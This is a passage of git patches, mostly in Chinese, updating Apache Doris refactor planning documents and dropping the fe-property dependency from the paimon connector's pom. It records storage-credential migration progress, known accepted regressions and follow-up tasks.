`AbstractS3CompatibleProperties.doBuildS3Configuration`(:117-120) 在 `getAwsCredentialsProviderTypeForBackend()` 非空时发,OSS/COS/OBS 基类(:124-129) 在 **ak/sk 皆空**时返回 `ANONYMOUS`(OSSProperties/COSProperties/OBSProperties 均不 override,仅 S3Properties override 恒非空)。S3 typed 路**有**该键(`S3FileSystemProperties:260`)。P1-T04 把 paimon BE 凭据切到 typed 路 → **无凭据 OSS/COS/OBS catalog 不再发 ANONYMOUS**。 +- **影响**:仅影响**无静态 ak/sk** 的 OSS/COS/OBS catalog(有 ak/sk 不受影响——两路都发 ak/sk → BE 短路 SimpleAWSCredentialsProvider)。BE `aws_credentials_provider_version=v2` 默认下,缺该键 → `CredProviderType::Default` → `CustomAwsCredentialsProviderChain`(探 WebIdentity/ECS/EC2 instance profile/... 最后才 anonymous)。故在带 **IAM role 的 EC2/ECS 主机**上,新路会**误取 instance 凭据**而非 anonymous + 元数据探测延迟;纯公开桶最终仍 anonymous 成功(**非硬失败**)。 +- **缓解**:**follow-up FU-T02**——给 fe-filesystem `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType`(镜像 `S3FileSystemProperties`),**精确 parity**=ak/sk 皆空时发 `ANONYMOUS`、否则省略(**非**无条件 DEFAULT)。超 P1 白名单(fe-filesystem 禁碰),与 FU-T01 同批/经用户批准。过渡期已知漂移。 +- **触发判据**:无凭据 OSS/COS/OBS paimon catalog 在带 IAM-role 的云主机上凭据选择异常 / 探测延迟(已知)。 + ## R-002 — 双 Storage 路径并存窗口 | 状态:监控中 - **描述**:迁移期 fe-core 旧 storage(hive/hudi/iceberg 用)与 fe-filesystem 新 storage(paimon 用)并存;同一 catalog 若两路推出不同配置会冲突。 - **影响**:配置/凭据不一致。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 00978c692b5701..66f99b1943b2ba 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -53,10 +53,17 @@ - **删 ~23 个 canonical-translation 测试**:现 `PaimonCatalogFactoryTest` 的 S3/OSS/COS/OBS/MinIO canonical 翻译断言测的是 **fe-filesystem 现在的职责**。**对抗 review(`wf_76df09a4-c2f`)+ 直接核实结论(修正初判)**:fe-filesystem 已覆盖 **canonical 键翻译**(`S3FileSystemPropertiesTest.toHadoopConfigurationMap`→fs.s3a.impl/endpoint/region/access.key/path.style)**+ endpoint-from-region 派生**(`OssFileSystemPropertiesTest:108-110` region→`-internal`;Cos/Obs endpoint+creds);**但 NOT 覆盖调优默认值**(S3 50/3000/1000、OSS/COS/OBS 100/10000/10000)→ 删 paimon `buildHadoopConfigurationEmitsS3TuningDefaults` 等丢了这部分**显式 UT 守护**(**功能今日正确**,由 fe-filesystem 字段默认真发;仅测试健壮性缺口)→ **记 R-006**,docker P1-T06 运行期兜底,fe-filesystem 加断言为 follow-up(超白名单)。保留并加 storage 参数的 = paimon.* 改键 / 原始透传 / last-write-wins / kerberos-ordering(含新增 storage-overlay 变体)/ DLF dlf.catalog.* 键与 endpoint-from-region(paimon-local) / hiveConfResources base-merge / socket-timeout / username alias / requireOssStorageForDlf 闸 / buildCatalogOptions / validate。 - **完成态(2026-06-17)**:实现 = `PaimonCatalogFactory`(applyStorageConfig 收 `storageHadoopConfig` 入参替代 `buildObjectStorageHadoopConfig(props)` call、删 fe-property import、3 builder 加参、HMS 三重载并为单一 3-arg)+ `PaimonConnector`(新增 `buildStorageHadoopConfig()` 遍历 `ctx.getStorageProperties().toHadoopProperties().toHadoopConfigurationMap()` 合并、4 调用点传入、REST 不用)+ pom 加 `fe-filesystem-api` 直接依赖(fe-property 依赖**留** P1-T05 删)。TDD:neuter `storageHadoopConfig.forEach(setter)` → 3 个 Applies/Overlays 测试 RED(`expected was `)→ 恢复 → GREEN。测试改造:删 ~23 canonical(fe-filesystem 职责,R-006 调优默认缺口)+ 留 adapt + 新增 6 契约测试(3 builder 各 Applies/Overlays storage + explicit-fs.s3a-overrides-storage + paimon-prefix-overrides-storage + kerberos-survives-storage-overlay)。验证:paimon 全模块 **292/0/0/1skip**(docker-gated PaimonLiveConnectivityTest)、`PaimonCatalogFactoryTest` 42/0、checkstyle 0、import-gate PASS、白名单干净。**对抗 review `wf_76df09a4-c2f`**(8 agent,1B+3M+2m;verify 推翻 1B+2M,confirm 1M=R-006 调优默认 UT 缺口[功能正确仅测试健壮性])。⚠️ **docker e2e 未跑**(真等价 Option C 闸在 P1-T06)。**DV-003-b**:fe-property import 已在 T03 删(P1-T05 退化为仅删 pom 边 + grep 闸)。 -### P1-T04 ⬜ PaimonScanPlanProvider BE 静态凭据改走 toBackendProperties().toMap() -- **做什么**:BE 静态凭据从 `ctx.getBackendStorageProperties()` 改为遍历 `getStorageProperties()` 调 `toBackendProperties().toMap()`。vended 动态路径**不动**(仍 `ctx.vendStorageCredentials`)。 -- **验收**:T1 BE map 等价;vended(REST/DLF) 路径回归不变。 +### P1-T04 ✅ PaimonScanPlanProvider BE 静态凭据改走 getStorageProperties().toBackendProperties().toMap()(2026-06-17,全量切,TDD RED→GREEN,292+1/0/1skip + checkstyle 0 + 对抗 review) +- **做什么**:BE 静态凭据从 `ctx.getBackendStorageProperties()` 改为遍历 `ctx.getStorageProperties()` 调 `toBackendProperties().ifPresent(b→putAll(b.toMap()))`(镜像 P1-T03 `.ifPresent` 风格)→ 发 `location.`。vended 动态路径**不动**(仍 `ctx.vendStorageCredentials`,叠在后→vended overlays static)。 +- **验收**:T1 BE map 等价(对象存储);vended(REST/DLF) 路径回归不变。 - **依赖**:P1-T01。设计 §4 P1-4 / §2.2。 +- **现场 recon 结论(2026-06-17,对照真实代码)**: + - **HDFS 缺口(关键发现,DV-002 未覆盖)**:新 typed 路对 **HDFS 物理上产不出 BE 键**——fe-filesystem **无 HDFS typed BE model**(`HdfsFileSystemProvider` 未 override `bind()`→默认抛 `UnsupportedOperationException`→`FileSystemPluginManager.bindAll` catch 并跳过→`getStorageProperties()` 对 HDFS-warehouse catalog 返回空)。legacy `getBackendStorageProperties()`(`DefaultConnectorContext:203`→`CredentialUtils`→fe-core `HdfsProperties.getBackendConfigProperties:198`)会发 HDFS `hadoop/dfs/HA/kerberos` 键,这些经 `PluginDrivenScanNode.getLocationProperties`→`FileQueryScanNode.setLocationPropertiesIfNecessary`→`HdfsResource.generateHdfsParam`→`THdfsParams` 是 **load-bearing**。故全量切会丢 HDFS BE 配置→HDFS-warehouse paimon 原生读回归。**对象存储侧两路等价**(typed 超集,DV-002)。 + - **关键事实**:`getBackendStorageProperties()` 是 **ConnectorContext SPI 方法、不依赖 fe-property**→**P1-T05 不需要本切换**;切换纯为 D-003 架构统一,而对 HDFS 物理做不到(除非动 fe-filesystem,超白名单)。 + - **用户定(2026-06-17)**:**按原计划全切**,接受 HDFS BE 回归,后续补 fe-filesystem `HdfsFileSystemProperties`(记 **DV-004 / R-007 / follow-up FU-T01**)。`getBackendStorageProperties()` SPI default 保留(连接器停调,移除非「新增」,留 follow-up 清理)。 +- **完成态(2026-06-17)**:实现 = `PaimonScanPlanProvider`(静态凭据块 `for sp : ctx.getStorageProperties() { sp.toBackendProperties().ifPresent(...putAll(toMap())) }` 替代 `getBackendStorageProperties()` 循环 + 加 `org.apache.doris.filesystem.properties.StorageProperties` import + 注释标 2 KNOWN GAP)。**仅 1 主文件改**(pom 无需改,fe-filesystem-api 依赖 P1-T03 已加)。TDD:`scanContext` 改喂 `getStorageProperties()` 的 fake `StorageProperties`(删 `getBackendStorageProperties` override)→ `getScanNodePropertiesNormalizesStaticCreds` RED(`expected ak was null`)→ 切产线 GREEN。新增 1 测试 `...SkipsStoragePropsWithoutBackendMappingAndMergesRest`(Optional.empty 跳过 + 多 entry merge,镜像 HDFS-空-项)+ 2 helper(`scanContextWithStorage`/`fakeStorageWithoutBackend`)。验证:`PaimonScanPlanProviderTest` **52/0**、paimon 全模块 **292/0/0/1skip**(docker-gated PaimonLiveConnectivityTest)、checkstyle 0、import-gate PASS、白名单干净(仅 2 paimon 文件)、零 `org.apache.doris.property/datasource` import。 +- **对抗 review(`wf_09745716-d48`,10 agent,3 lens + verify)**:7 finding,confirm 4。**(1) MAJOR=R-008**(fe-filesystem OSS/COS/OBS typed BE map 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`,无凭据 catalog 的 legacy `ANONYMOUS` 丢失;**fix 在 fe-filesystem 超白名单**→记 R-008 + **follow-up FU-T02**,仅影响无 ak/sk 的 OSS/COS/OBS);**(2) MINOR→已修**(fake 恒 `Optional.of` 漏 `.ifPresent` 空分支→新增上述测试覆盖);**(3) NIT→已修**(多 entry merge 未测→同测试覆盖);**(4) NIT→已修**(非空 ctx+空 list→同测试覆盖)。verify 推翻 3 假 finding(AWS_BUCKET/ROOT_PATH 超集=DV-002 已接受非回归;「测试没钉新 seam」被**实测 mutation 推翻**——回退旧 seam→RED;OverlaysVended 静态缺失由 sibling NormalizesStaticCreds 覆盖)。 +- ⚠️ **docker e2e 未跑**(真等价 Option C 闸在 P1-T06;HDFS flavor 会暴露 R-007、无凭据 OSS/COS/OBS 暴露 R-008,均**已接受、非新 bug**)。 ### P1-T05 ⬜ 断开 paimon → fe-property 依赖边 - **做什么**:删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖 + `PaimonCatalogFactory:20` 的 import。 @@ -116,6 +123,18 @@ --- +## Follow-ups(范围外占位,本次不做) + +### FU-T01 ⬜(follow-up,本次不做)给 fe-filesystem 新建 HDFS typed BE model(修 DV-004 / R-007) +- **做什么**:在 `fe-filesystem-hdfs` 新建 `HdfsFileSystemProperties`(`implements FileSystemProperties, BackendStorageProperties`,承载 `hadoop.*/dfs.*/HA/kerberos` 的 BE 键),并让 `HdfsFileSystemProvider` override `FileSystemProvider.bind()` 返回它(取代当前默认抛 `UnsupportedOperationException`)。这样 `FileSystemPluginManager.bindAll` 会收集 HDFS 项、`getStorageProperties().toBackendProperties().toMap()` 对 HDFS-warehouse paimon catalog 重新产出 BE 键 → 修复 P1-T04 的 HDFS BE 回归(DV-004 / R-007)。 +- **验收**:HDFS-warehouse paimon docker flavor(含 HA / kerberized HMS+HDFS)原生读恢复;fe-filesystem `HdfsFileSystemProperties` BE 键集与 legacy fe-core `HdfsProperties.getBackendConfigProperties` 等价(HA/kerberos 含齐);对象存储 flavor 零回归。 +- **依赖**:P1-T04(暴露缺口)。**范围外**:动 `fe-filesystem-hdfs`(超 P1 白名单——fe-filesystem 禁碰),须经用户批准/扩范围,宜与 D-007 fe-kerberos 收口(P3b)或 fe-filesystem 迁移批次同做。 + +### FU-T02 ⬜(follow-up,本次不做)给 fe-filesystem OSS/COS/OBS 补 AWS_CREDENTIALS_PROVIDER_TYPE(修 R-008) +- **做什么**:给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType` 字段 + 在 `toBackendKv()` 发 `AWS_CREDENTIALS_PROVIDER_TYPE`,**精确镜像 legacy**(ak/sk 皆空 → `ANONYMOUS`,否则**省略**——legacy OSS/COS/OBS 仅 blank-creds 才发,非无条件)。 +- **验收**:无凭据 OSS/COS/OBS catalog 的 typed BE map 与 legacy 等价(含 `ANONYMOUS`);有凭据零变化;docker 覆盖(含 IAM-role 主机场景)。 +- **依赖**:P1-T04(暴露缺口,对抗 review `wf_09745716-d48`)。**范围外**:动 `fe-filesystem-{oss,cos,obs}`(超 P1 白名单——fe-filesystem 禁碰),与 FU-T01 同批/经用户批准。 + ## 阶段日志(append-only) - 2026-06-17:创建任务清单(P0×2 / P1×6 / P2×5),状态全 ⬜,待用户批准后开始 P1。 - 2026-06-17:3 设计点定稿(D-006 provider 取代 MetaStoreType 枚举 / D-007 fe-kerberos 叶子 / D-008 vended 边界);P2-T01/T02 改写(去枚举、加 MetaStoreProvider);新增 P3a/P3b(Kerberos)。 From 5b24d934dac536366ddcc2bd2346a6b498af6fc7 Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 21:41:48 +0800 Subject: [PATCH 083/128] [P1-T05] fe-connector-paimon: drop the fe-property dependency edge MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Remove the fe-property block from fe-connector-paimon/pom.xml. The import/call were already removed in P1-T03 (DV-003-b), so this is the pom edge only. The fe-property module itself is NOT deleted (D-005) — it simply becomes a zero-consumer orphan. Verification (the gate IS the build — no unit test to write): full paimon module compiles and all tests stay green (293/0/1skip, incl. P1-T04's added test), proving no hidden transitive reliance on fe-property; paimon now depends only on fe-connector-{api,spi} + fe-filesystem-api + fe-thrift (provided) + paimon SDK + hive-shade. grep org.apache.doris.property over paimon src == 0, no fe-property artifact in the pom, checkstyle 0, import-gate PASS, whitelist clean (pom only). docker e2e NOT run. This formally severs paimon's storage edge to fe-property; P1 storage consolidation now only has P1-T06 (verification) remaining. Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 9 ----- .../metastore-storage-refactor/HANDOFF.md | 38 +++++++++++-------- .../metastore-storage-refactor/PROGRESS.md | 13 ++++--- plan-doc/metastore-storage-refactor/tasks.md | 8 ++-- 4 files changed, 35 insertions(+), 33 deletions(-) diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index 72649f0b5a5862..afd35ff4d7dd56 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -64,15 +64,6 @@ under the License. ${project.version} - - - ${project.groupId} - fe-property - ${project.version} - - ${project.groupId} diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index ff234355da74ff..145a7628c10937 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,11 +7,17 @@ --- -**更新时间**:2026-06-17(实现 session:P1-T04 完成) +**更新时间**:2026-06-17(实现 session:P1-T04 + **P1-T05** 完成) **更新人**:Claude(Opus 4.8) -## 这次 session 完成了什么 -1. **P1-T04 ✅**(paimon BE 静态凭据切 typed 路):`PaimonScanPlanProvider.getScanNodeProperties()` 的 BE 静态凭据块从 `ctx.getBackendStorageProperties()` 改为遍历 `ctx.getStorageProperties()` 调 `sp.toBackendProperties().ifPresent(b → backendStorageProps.putAll(b.toMap()))` → 发 `location.`(镜像 P1-T03 `.ifPresent` 风格)。**vended 块(`ctx.vendStorageCredentials`)不动、仍叠在静态块之后**→vended overlays static 保序。加 `org.apache.doris.filesystem.properties.StorageProperties` import;pom 无需改(fe-filesystem-api 依赖 P1-T03 已加)。**仅改 `PaimonScanPlanProvider.java` 1 主文件 + 其测试**。 +## 这次 session 完成了什么(P1-T04 + P1-T05) + +**P1-T05 ✅(最新)**:删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖块(**仅删 pom 边**——import/call 已在 P1-T03 清,DV-003-b;fe-property 模块本身不删 D-005 → 变 0 消费者孤儿)。recon 证 paimon src(main+test)`org.apache.doris.property` 已 **ZERO**、唯一物理耦合 = pom :72,其余 `fe-property` 字样皆历史注释(不动,surgical)。**RED/GREEN = 构建闸**(无 UT 可写):删后全模块编译 + 全 UT 仍绿 = 证无隐藏 transitive 断裂。验证:paimon 全模块 **293/0/0/1skip**(含 P1-T04 新增 1 测试)、grep 归零、pom 无 fe-property、checkstyle 0、import-gate PASS、白名单干净(仅 pom 1 文件)。**P1 storage 收口的依赖边正式断开**(trivial 机械改,未跑对抗 review)。 + +--- + +**P1-T04 ✅(本 session 较早)**: +1. **paimon BE 静态凭据切 typed 路**:`PaimonScanPlanProvider.getScanNodeProperties()` 的 BE 静态凭据块从 `ctx.getBackendStorageProperties()` 改为遍历 `ctx.getStorageProperties()` 调 `sp.toBackendProperties().ifPresent(b → backendStorageProps.putAll(b.toMap()))` → 发 `location.`(镜像 P1-T03 `.ifPresent` 风格)。**vended 块(`ctx.vendStorageCredentials`)不动、仍叠在静态块之后**→vended overlays static 保序。加 `org.apache.doris.filesystem.properties.StorageProperties` import;pom 无需改(fe-filesystem-api 依赖 P1-T03 已加)。**仅改 `PaimonScanPlanProvider.java` 1 主文件 + 其测试**。 2. **关键 recon 发现(DV-002 未覆盖)+ 用户定向**:新 typed 路对 **HDFS 物理上产不出 BE 键**(fe-filesystem **无 HDFS typed BE model**:`HdfsFileSystemProvider` 未 override `bind()`→默认抛 `UnsupportedOperationException`→`FileSystemPluginManager.bindAll` catch 跳过→`getStorageProperties()` 对 HDFS catalog 返回空)。legacy `getBackendStorageProperties()`(fe-core `HdfsProperties.getBackendConfigProperties`)发的 HDFS `hadoop/dfs/HA/kerberos` 键经 `PluginDrivenScanNode→FileQueryScanNode.setLocationPropertiesIfNecessary→HdfsResource.generateHdfsParam→THdfsParams` 是 **load-bearing**→全量切会丢→HDFS paimon 原生读回归。又:`getBackendStorageProperties()` 是 **ConnectorContext 方法、不依赖 fe-property**→**P1-T05 并不需要本切换**,切换纯为 D-003 统一。**用户 2026-06-17 定:按原计划全量切 + 接受 HDFS BE 回归 + follow-up 补 fe-filesystem `HdfsFileSystemProperties`**(记 **DV-004 / R-007 / FU-T01**)。 3. **TDD**:`scanContext` helper 改喂 `getStorageProperties()` 的 fake `StorageProperties`(删 `getBackendStorageProperties` override)→ `getScanNodePropertiesNormalizesStaticCreds` RED(`expected ak was null`)→ 切产线 GREEN。 4. **对抗 review confirm 修**:新增 1 测试 `...SkipsStoragePropsWithoutBackendMappingAndMergesRest`(混 `Optional.empty()`-无-BE 项[HDFS-like] + 真对象存储项 → 钉 `.ifPresent` 跳过 + 多 entry `putAll` merge;mutation `.ifPresent→.get()`→RED)+ 2 helper(`scanContextWithStorage`/`fakeStorageWithoutBackend`)。 @@ -19,26 +25,28 @@ 6. **对抗 review**(`wf_09745716-d48`,10 agent,3 lens + verify):7 finding confirm 4。**confirm 1 MAJOR=R-008**(fe-filesystem `Oss/Cos/ObsFileSystemProperties.toBackendKv()` 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`,legacy 对无凭据 OSS/COS/OBS 发 `ANONYMOUS`;S3 typed 有;**fix 在 fe-filesystem 超 P1 白名单**→记 R-008 + **FU-T02**;仅影响无 ak/sk 的 OSS/COS/OBS,带 IAM-role 主机会误取 instance 凭据,公开桶仍 anonymous 非硬失败)+ **3 test-gap 已修**(上条测试)。verify **推翻 3 假 finding**:AWS_BUCKET/ROOT_PATH 超集=DV-002 已接受非回归;「测试没钉新 seam」被**实测 mutation 推翻**(回退旧 seam→RED);OverlaysVended 静态缺失由 sibling NormalizesStaticCreds 覆盖。 ## 当前状态 -- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧(P1 4/6)**。 -- 任务计数 **6/14**(P0: 2/2 ✅ | P1: 4/6 | P2: 0/5 | P3a: 0/1)| follow-up 占位 P3b/FU-T01/FU-T02。 -- **连接器 storage + BE 凭据路全切 fe-filesystem-api typed**:catalog 配置 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`(P1-T03);BE 扫描分片 `PaimonScanPlanProvider`→`getStorageProperties().toBackendProperties().toMap()`→`location.*`(P1-T04,vended overlays static 不动)。 -- paimon main 已**零** `org.apache.doris.property/datasource` import;`fe-property` pom 依赖仍在(变 0 import 消费者,P1-T05 删边)。 +- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧(P1 5/6,仅剩 P1-T06 验证)**。 +- 任务计数 **7/14**(P0: 2/2 ✅ | P1: 5/6 | P2: 0/5 | P3a: 0/1)| follow-up 占位 P3b/FU-T01/FU-T02。 +- **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 配置 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`(P1-T03);BE 扫描分片 `PaimonScanPlanProvider`→`getStorageProperties().toBackendProperties().toMap()`→`location.*`(P1-T04,vended overlays static 不动)。 +- paimon 已**零** `org.apache.doris.property/datasource` import **+ pom 无 fe-property 依赖**(P1-T05);fe-property 变 0 消费者孤儿(本次不物理删,D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,fix 超 P1 白名单)**:①HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);②无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。用户接受、follow-up 修、docker P1-T06 会暴露(**非新 bug**)。 - ⚠️ **e2e/docker 未跑**(本 session 仅 compile + UT + 对抗 review)。 -## 下一步(明确):P1-T05(断开 paimon → fe-property 依赖边) +## 下一步(明确):P1-T06(P1 验证收口) > **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手。** 下面是已知方案,但须现场核实。 -**目标**:删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖边 + `grep` 归零闸。**import/call 已在 P1-T03 清(DV-003-b)→ P1-T05 退化为仅删 pom 边**。**`fe-property` 模块本身不删**(D-005,变 0 消费者孤儿)。 +**目标**:P1 收口验证。(1) paimon UT 全绿(**已 293/0/1skip**);(2) docker `enablePaimonTest=true` 跑 paimon **5 flavor**(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS;(3) **真 T1 等价闸 Option C**——docker 真 fe-filesystem 对象存储 impl 在 classpath,端到端读私有对象存储桶验 storage 配置/凭据真发(UT 因 impl 是运行时插件无法验,故 docker 兜底)。 + +**重点验已知边界(本 session 引入,须区分「已知接受」vs「真新回归」)**: +- **R-007(HDFS 回归,已接受)**:HDFS-warehouse paimon flavor 的 BE 原生读会因缺 `THdfsParams` 失败/降级(fe-filesystem 无 HDFS typed BE model,DV-004/FU-T01)。docker HDFS flavor **应暴露此回归**——确认它就是 R-007、**非新 bug**(勿误判为本次破坏)。若 docker filesystem flavor 用 HDFS warehouse → 预期失败;用 local/对象存储 → 应正常。 +- **R-008(无凭据 OSS/COS/OBS ANONYMOUS 漂移,已接受)**:仅无 ak/sk 的 OSS/COS/OBS catalog 受影响(FU-T02);带 ak/sk 的不受影响。 +- **R-006(调优默认无 UT 守护)**:docker 运行期兜底确认 S3 50/3000/1000、OSS/COS/OBS 100/10000/10000 真发。 -**先做 recon(关键未知)**: -- `grep -n 'fe-property' fe/fe-connector/fe-connector-paimon/pom.xml`:确认依赖块确切位置 + scope(compile?test?有无被别处 transitive 需要)。 -- 删后 `grep -rn 'org.apache.doris.property' fe/fe-connector/fe-connector-paimon/src` **必须 == 0**(main 已零;核 test 是否还有残留 import,若有需先清)。 -- 删后**全模块编译 + 全 UT 必须仍绿**(确认无隐藏 transitive 依赖断裂——paimon 现仅应依赖 `fe-connector-{api,spi}` + `fe-filesystem-api` + `fe-thrift(provided)` + paimon SDK)。 +**先做 recon(关键未知)**:读 docker 编排 + regression suite 的 paimon flavor 覆盖(`enablePaimonTest` gate 位置、5 flavor 如何起、各 flavor 用何 warehouse 后端=对象存储 or HDFS);确认哪些 flavor 真跑对象存储(验 P1-T03/T04 storage 路)、哪些跑 HDFS(触发 R-007)。可用技能 `doris-docker-regression` / `regression_doris`。 -**编译/测**:`mvn -f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl fe-connector/fe-connector-paimon -am package -Dassembly.skipAssembly=true -Dmaven.build.cache.enabled=false`(看 `BUILD SUCCESS` 行 + `Tests run` 292/1skip)。checkstyle 0、import-gate PASS、`git diff --name-only` 仅 `fe-connector-paimon/pom.xml`(+ 本跟踪目录)。 +**若本环境不部署 docker → 明确标「未跑 e2e」**(CLAUDE.md Rule 12),不得把「UT 过 + 编译过」当「e2e 验过」。P1-T06 不跑 docker 即不能算真正收口,需在 PROGRESS/HANDOFF 标注待补。 -**之后**:P1-T06(paimon UT + docker `enablePaimonTest=true` 5 flavor,**真 T1 等价闸 Option C**;**验 R-006 调优默认 + R-007 HDFS 回归边界 + R-008 OSS/COS/OBS ANONYMOUS**;不跑则标「未跑 e2e」)。 +**之后**:P1 收口 → P2(metastore SPI:P2-T01 新建 fe-connector-metastore-api …);follow-up FU-T01/FU-T02/R-006 与 fe-filesystem 收口批次同做。 ## 未决 / 需注意 - ✅ 已定:范围 P0+P1(到 P1-T06)|机制 A(D-009)|T1=Option C(DV-003)|P1-T04 全量切 + 接受 fe-filesystem typed BE model 缺口回归(用户 2026-06-17)。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 5fa2fe57110d1c..7b081482b568eb 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,18 +10,18 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | ██████░░░░ ~43% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 4/6,连接器侧 storage(P1-T03)+BE 凭据(P1-T04)均切 fe-filesystem-api typed) | +| **Implement(实现)** | ███████░░░ ~50% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 5/6,storage+BE 凭据切 fe-filesystem-api typed + paimon→fe-property 依赖边已断) | -任务计数:**6 / 14** 完成(P0: 2/2 ✅ | P1: 4/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b / FU-T01 / FU-T02**(follow-up,范围外占位)。 +任务计数:**7 / 14** 完成(P0: 2/2 ✅ | P1: 5/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b / FU-T01 / FU-T02**(follow-up,范围外占位)。仅剩 **P1-T06**(验证)即 P1 收口。 --- ## 当前活跃 task -- **下一个:`P1-T05`**(删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖边 + `grep org.apache.doris.property` 归零闸;import/call 已在 P1-T03 清,DV-003-b → P1-T05 退化为仅删 pom 边)。 -- P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|**P1-T04 ✅**(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)。 -- ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon main 已零 `org.apache.doris.property/datasource` import(DV-003-b:P1-T05 仅剩删 pom 边)。 +- **下一个:`P1-T06`**(P1 验证收口):paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS;**真 T1 等价闸 Option C**。**若不部署 docker → 明确标「未跑 e2e」**(CLAUDE.md Rule 12)。 +- P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|P1-T04 ✅(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)|**P1-T05 ✅**(删 paimon→fe-property pom 依赖边 + grep 归零闸)。 +- ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon 已零 `org.apache.doris.property/datasource` import + pom 无 fe-property 依赖(fe-property 变 0 消费者孤儿,本次不物理删 D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 -- ▶ **下一步**:P1-T05(删 pom 边)→ P1-T06(docker 5-flavor 真等价闸 Option C;验 R-006 调优默认 + R-007/R-008 已知回归边界)。 +- ▶ **下一步**:P1-T06(docker 5-flavor 真等价闸 Option C;验 R-006 调优默认 + R-007/R-008 已知回归边界)→ P1 收口 → 后续 P2(metastore SPI)。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 @@ -31,6 +31,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-17 **P1-T05 ✅**(断开 paimon→fe-property 依赖边):删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖块(仅删 pom 边——import/call 已在 P1-T03 清 DV-003-b)。recon 确认 paimon src(main+test)`org.apache.doris.property` 已 ZERO、唯一物理耦合是 pom :72,其余 `fe-property` 字样皆历史注释(不动)。**RED/GREEN=构建闸**(无 UT 可写):删后全模块编译+全 UT 仍绿=证无隐藏 transitive 断裂。验证:paimon 全模块 **293/0/0/1skip**、grep 归零、pom 无 fe-property、checkstyle 0、import-gate PASS、白名单干净(仅 pom)。**fe-property 变 0 消费者孤儿(本次不物理删,D-005)**。⚠️ docker e2e 未跑。仅剩 P1-T06 验证即 P1 